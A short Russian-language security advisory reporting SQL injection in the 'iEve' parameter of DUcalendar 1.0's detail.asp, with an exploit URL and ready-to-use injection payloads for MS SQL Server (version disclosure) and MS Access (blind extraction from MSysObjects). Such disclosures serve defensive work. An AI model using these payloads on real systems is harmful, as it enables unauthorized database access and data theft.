Программа: DUcalendar 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «iEve» сценарием detail.asp. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://d0rk.co.il/calendar/detail.asp?iEve={SQL}
Для Ms SQL Server:
convert(int,(select+@@version))--
Для Ms ACCESS (Blind-way):
IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20
Name%20from%20MSysObjects))='a',0,'done')%00
